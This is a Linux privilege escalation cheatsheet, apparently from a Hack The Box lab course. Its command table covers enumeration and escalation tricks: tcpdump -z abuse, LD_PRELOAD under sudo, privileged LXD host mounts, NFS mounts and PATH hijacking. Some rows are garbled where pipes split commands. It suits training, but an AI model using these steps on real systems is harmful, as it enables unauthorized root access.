Linux Privilege Escalation Cheatsheet
Linux privilege escalation is a critical security concern that involves exploiting vulnerabilities or misconfigurations to gain elevated access to a system. This technique can be used both by authorized users to perform administrative tasks and by attackers to compromise a system’s security. Authorized users typically use tools like sudo to temporarily elevate their privileges for specific tasks, such as system configuration or software installation. However, attackers exploit weaknesses in the system, such as kernel vulnerabilities, misconfigured services, or file permissions, to escalate their privileges from a limited user account to the powerful root account. This can lead to severe consequences, including data theft, malware deployment, and system damage. Understanding the methods of privilege escalation is essential for both ethical hackers and system administrators to enhance security and prevent unauthorized access.
Linux
| Command | Description |
|---|---|
| ssh htb-student@ | SSH to lab target |
| ps aux | grep root |
| ps au | See logged in users |
| ls /home | View user home directories |
| ls -l ~/.ssh | Check for SSH keys for current user |
| history | Check the current user’s Bash history |
| sudo -l | Can the user run anything as another user? |
| ls -la /etc/cron.daily | Check for daily Cron jobs |
| lsblk | Check for unmounted file systems/drives |
| find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null | Find world-writeable directories |
| find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null | Find world-writeable files |
| uname -a | Check the Kernel versiion |
| cat /etc/lsb-release | Check the OS version |
| gcc kernel_expoit.c -o kernel_expoit | Compile an exploit written in C |
| screen -v | Check the installed version of Screen |
| ./pspy64 -pf -i 1000 | View running processes with pspy |
| find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null | Find binaries with the SUID bit set |
| find / -user root -perm -6000 -exec ls -ldb {} ; 2>/dev/null | Find binaries with the SETGID bit set |
| sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root | Priv esc with tcpdump |
| echo $PATH | Check the current user’s PATH variable contents |
| PATH=.:${PATH} | Add a . to the beginning of the current user’s PATH |
| find / ! -path “/proc/” -iname “config” -type f 2>/dev/null | Search for config files |
| ldd /bin/ls | View the shared objects required by a binary |
| sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart | Escalate privileges using LD_PRELOAD |
| readelf -d payroll | grep PATH |
| gcc src.c -fPIC -shared -o /development/libshared.so | Compiled a shared libary |
| lxd init | Start the LXD initialization process |
| lxc image import alpine.tar.gz alpine.tar.gz.root –alias alpine | Import a local image |
| lxc init alpine r00t -c security.privileged=true | Start a privileged LXD container |
| lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true | Mount the host file system in a container |
| lxc start r00t | Start the container |
| showmount -e 10.129.2.12 | Show the NFS export list |
| sudo mount -t nfs 10.129.2.12:/tmp /mnt | Mount an NFS share locally |
| tmux -S /shareds new -s debugsess | Created a shared tmux session socket |
| ./lynis audit system | Perform a system audit with Lynis |